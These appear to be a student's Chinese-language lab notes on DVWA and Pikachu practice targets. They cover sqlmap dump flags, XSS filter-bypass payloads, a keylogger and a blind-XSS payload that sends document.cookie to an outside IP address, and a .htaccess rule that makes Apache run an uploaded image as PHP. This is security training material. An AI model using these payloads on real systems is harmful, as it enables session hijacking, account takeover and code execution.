1、使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入
--dbs 列出数据库
--tables,-D 列出表格,可以指定数据库
--columns -T,-D 列出字段的信息,可以指定数据库,数据表,字段
--dump,-C,-T,-D,--start,--stop,--first,--last :获取表的数据
2、XSS
(1)完成DVWA靶场存储型XSS的漏洞练习
中等
message参数中使用addslashes(),识别预定义字符:单引号(')、双引号(")、反斜杠(\)和 NULL
name参数中替换script为空
方法:
在name标签中:
大小写绕过 <SCRIPT>alert(1)</SCRIPT>
双写绕过 <scr<script>ipt>alert(1)</scr<script>ipt>
采用其他标签 <img src=x οnerrοr=alert(1)>
高等
message参数中使用addslashes()
name中参数使用正则表达式
方法:在name参数中采用其他事件
<img src=x οnerrοr=alert(1)>
(2)使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie,利用cookie实现登录
在pikachu中存在rk.js,可以监视用户输出的键盘记录
rk.js
定义ajax与xl两个类,定义onkeypress方法,定义realkey接收从键盘传回来的记录,将记录存储到xl里
将记录存储在postdate中,再将该类发送给rkserver.php
rkserver.php
接收传送的值,在后端运行
在具有xss漏洞的正常服务器中插入该代码
内容未显示,代表被解析
访问恶意服务器,完成对该正常服务器的键盘记录
xss获取cookie
cookie.php
该文件定义了获取用户请求信息.
pyload:
<script>document.write('<img src="http://47.108.95.46:8000/pkxss/xcookie/cookie.php?cookie='+document.cookie+'"/>')</script>
通过盲打xss,在登陆后台时,触发该代码执行,获取用户
在cookie-editor中输入cookie值,再输入原网站,完成登录
(3)使用beef制作钓鱼页面,克隆任意站点的登录页面并获取用户登录的账号密码
启动失败了,没搞懂
3、文件上传
(1)客户端绕过练习
js禁用
F12 F1 js禁用
后缀名绕过
该代码是基于前端的代码,只允许jpg png gif 后缀的文件上传
传输get型参数
post型可以用蚁键连接或者使用hackbar post 传参
修改前端代码
将调用checkFile 方法删除,可以直接上传php文件
(2)服务端黑名单绕过:给出.htaccess文件绕过的具体步骤
.htaccess文件绕过 (pass-04)
.htaccess为分布配置文件,可以指定自己目录下的配置规则
中间件为apache时,没有对.htaccess文件进行检测
.htaccess文件:
<FilesMatch "1.jpg">
Sethandler application/x-httpd-php
</FilesMatch>
(将1.jpg的文件以PHP文件来解析)
(将具有php格式的文件以php文件来解析)
<IfModule mime_module>
SetHandler application/x-httpd-php
</IfModule>
上传该文件会使得该服务器出错,因为会使部分文件以php文件解析,无法完成功能
在上传.htaccess文件后,更改配置文件,使得上传的1.jpg文件以php解析,完成上传